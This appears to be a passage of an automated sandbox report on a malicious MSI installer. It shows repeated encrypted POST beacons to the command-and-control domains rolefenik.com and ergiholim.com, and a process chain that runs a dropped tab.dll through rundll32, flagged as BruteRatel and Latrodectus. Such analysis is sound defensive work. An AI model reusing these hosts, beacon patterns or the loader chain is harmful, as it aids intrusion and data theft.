                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:57 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:57 UTC | 759 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:57 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nLAydMiW6wq5NX7VyHHxwXVR954BZZN19pr%2Fc73sBI%2Fooac%2Bw2zIH3%2BxnqtVYZwusvyxUn%2BOHt%2B8y%2BeGmPyUSYgMcdHgjhKb4Uwkm2gIIQ%2BFLEXQCIyZ0yhKpxQLJafs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073dc8feb2c92-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1323&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=2077474&cwnd=241&unsent_bytes=0&cid=710d166ca75f1c1a&ts=531&x=0"
                                                                                                                                          2024-11-13 17:23:57 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          95 | 192.168.2.6 | 50092 | 104.21.15.162 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:58 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:58 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:59 UTC | 754 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:59 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ul3wDHWBtDtV4CecVC%2BthOkAynJZ%2BVUwI2yQHNCmaM3M3UNzqPfHo4sPm2GP2px4nQ2zd6BXPvmdCzdL3pqkf%2Bnz%2FtP9o81hFYCYqmxc4ticF%2By3xW3nVsfa%2F6yAdVY7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073e5cc2ef661-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=137741&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=21023&cwnd=32&unsent_bytes=0&cid=754fa116d078c5c9&ts=796&x=0"
                                                                                                                                          2024-11-13 17:23:59 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          96 | 192.168.2.6 | 50093 | 104.21.92.105 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:24:00 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:24:00 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:24:01 UTC | 748 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:24:01 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oyVBkPNy41tq298pu4n33CS1Ev%2BnEqwvov1tbJoTlZW%2FNTge1DMj5c4gyx5l2mcBk4DIjkbAkIvqmhhmW%2FKK9QxYFih7W3sGUqWzgShQzOLRfkEQu6bv7NPfCV71VaJ0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073f11e3925fb-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=138192&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20897&cwnd=32&unsent_bytes=0&cid=b5e9611d9260418d&ts=744&x=0"
                                                                                                                                          2024-11-13 17:24:01 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:24:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          97 | 192.168.2.6 | 50094 | 104.21.15.162 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:24:02 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:24:02 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:24:02 UTC | 749 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:24:02 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NGtY3IjLAUJPWyE1wcH3yqVlbnrAuxWmh%2B%2FQ10uhPIukqT4Vnr31VlkxbEHcWHOdDp4scBOZp7p4617%2FiRZ1Lozx28cJeidDuygO60zpYrapfQUZdEKrrlEQejZUWDAE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073f918922ccb-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1575&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=1960731&cwnd=114&unsent_bytes=0&cid=f174f0bd30c35b1b&ts=732&x=0"
                                                                                                                                          2024-11-13 17:24:02 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:24:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          98 | 192.168.2.6 | 50095 | 104.21.92.105 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:24:03 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:24:03 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:24:04 UTC | 760 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:24:04 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=77Yn8nPOS%2BnC%2BOaDiM2kr1yN5VP9DXBfkemMJ%2Ba%2BB8%2BXcj1T8yTIEFb%2FewfIpdU95t9DVnG5tuzFaf%2B9m1WQ9X6WDYhpW9%2B6EsZKY4Nb4YfkIyMX7zJBvjiB4qVl%2Fj4Z"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207403981bd791-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=132759&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=19707&cwnd=32&unsent_bytes=0&cid=3e8c045f2fe6e30b&ts=876&x=0"
                                                                                                                                          2024-11-13 17:24:04 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:24:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Target ID:0
                                                                                                                                          Start time:12:20:01
                                                                                                                                          Start date:13/11/2024
                                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\medk.msi"
                                                                                                                                          Imagebase:0x7ff719990000
                                                                                                                                          File size:69'632 bytes
                                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:2
                                                                                                                                          Start time:12:20:01
                                                                                                                                          Start date:13/11/2024
                                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                          Imagebase:0x7ff719990000
                                                                                                                                          File size:69'632 bytes
                                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:12:20:02
                                                                                                                                          Start date:13/11/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 31D436F1086AC158C6FA541C36CED057
                                                                                                                                          Imagebase:0x8c0000
                                                                                                                                          File size:59'904 bytes
                                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:12:20:02
                                                                                                                                          Start date:13/11/2024
                                                                                                                                          Path:C:\Windows\Installer\MSI8F42.tmp
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\Installer\MSI8F42.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\tab.dll, Object
                                                                                                                                          Imagebase:0x2f0000
                                                                                                                                          File size:399'328 bytes
                                                                                                                                          MD5 hash:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:12:20:03
                                                                                                                                          Start date:13/11/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\tab.dll, Object
                                                                                                                                          Imagebase:0x3b0000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:12:20:03
                                                                                                                                          Start date:13/11/2024
                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\tab.dll, Object
                                                                                                                                          Imagebase:0x7ff64f140000
                                                                                                                                          File size:71'680 bytes
                                                                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.2232622768.000002931397B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.2232567502.000002931397B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000006.00000003.2232697308.000002931397B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:8
                                                                                                                                          Start time:12:20:12
                                                                                                                                          Start date:13/11/2024
                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                                          Imagebase:0x7ff609140000
                                                                                                                                          File size:5'141'208 bytes
                                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000002.4591745236.000000000E21B000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false


                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:1.6%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:38.8%
                                                                                                                                            Total number of Nodes:384
                                                                                                                                            Total number of Limit Nodes:11

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 002F57C0: GetCurrentProcess.KERNEL32(00000008,?,7642E7B1,?,-00000010), ref: 002F57D0
                                                                                                                                              • Part of subcall function 002F57C0: OpenProcessToken.ADVAPI32(00000000), ref: 002F57D7
                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 002F4C15
                                                                                                                                            • CoCreateInstance.OLE32(003372B0,00000000,00000004,00345104,00000000,?), ref: 002F4C45
                                                                                                                                            • CoUninitialize.COMBASE ref: 002F5187
                                                                                                                                            • _com_issue_error.COMSUPP ref: 002F51B5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 928366108-0

                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 002F6AC8
                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 002F6AD5
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 002F6AF5
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CloseCurrentHandleOpenToken
                                                                                                                                            • String ID: S-1-5-18
                                                                                                                                            • API String ID: 4052875653-4289277601

                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,7642E7B1,?,-00000010), ref: 002F57D0
                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 002F57D7
                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 002F580C
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 002F5822
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 215268677-0

                                                                                                                                            APIs
                                                                                                                                            • GetCommandLineW.KERNEL32(7642E7B1,?,?,?,?,?,?,?,?,?,003356D5,000000FF), ref: 002FCDE8
                                                                                                                                              • Part of subcall function 002F1F80: LocalAlloc.KERNEL32(00000040,00000000,?,?,vector too long,002F4251,7642E7B1,00000000,?,00000000,?,?,?,00334400,000000FF,?), ref: 002F1F9D
                                                                                                                                            • ExitProcess.KERNEL32 ref: 002FCEB1
                                                                                                                                              • Part of subcall function 002F6600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 002F667E
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                                                                                            • String ID: Full command line:
                                                                                                                                            • API String ID: 1878577176-831861440

                                                                                                                                            APIs
                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,002F5E18,7642E7B1,?), ref: 002F5EB4
                                                                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,002F5E18,7642E7B1,?), ref: 002F5EBE
                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,002F5E18,7642E7B1,?), ref: 002F5F1A
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InformationToken$ErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2567405617-0

                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00317375,00325458,?,00316CE7,00000000,A82,00000000,?,?,?,0032363B,?,00000000,00000004), ref: 00325921
                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 003259C3
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1452528299-0

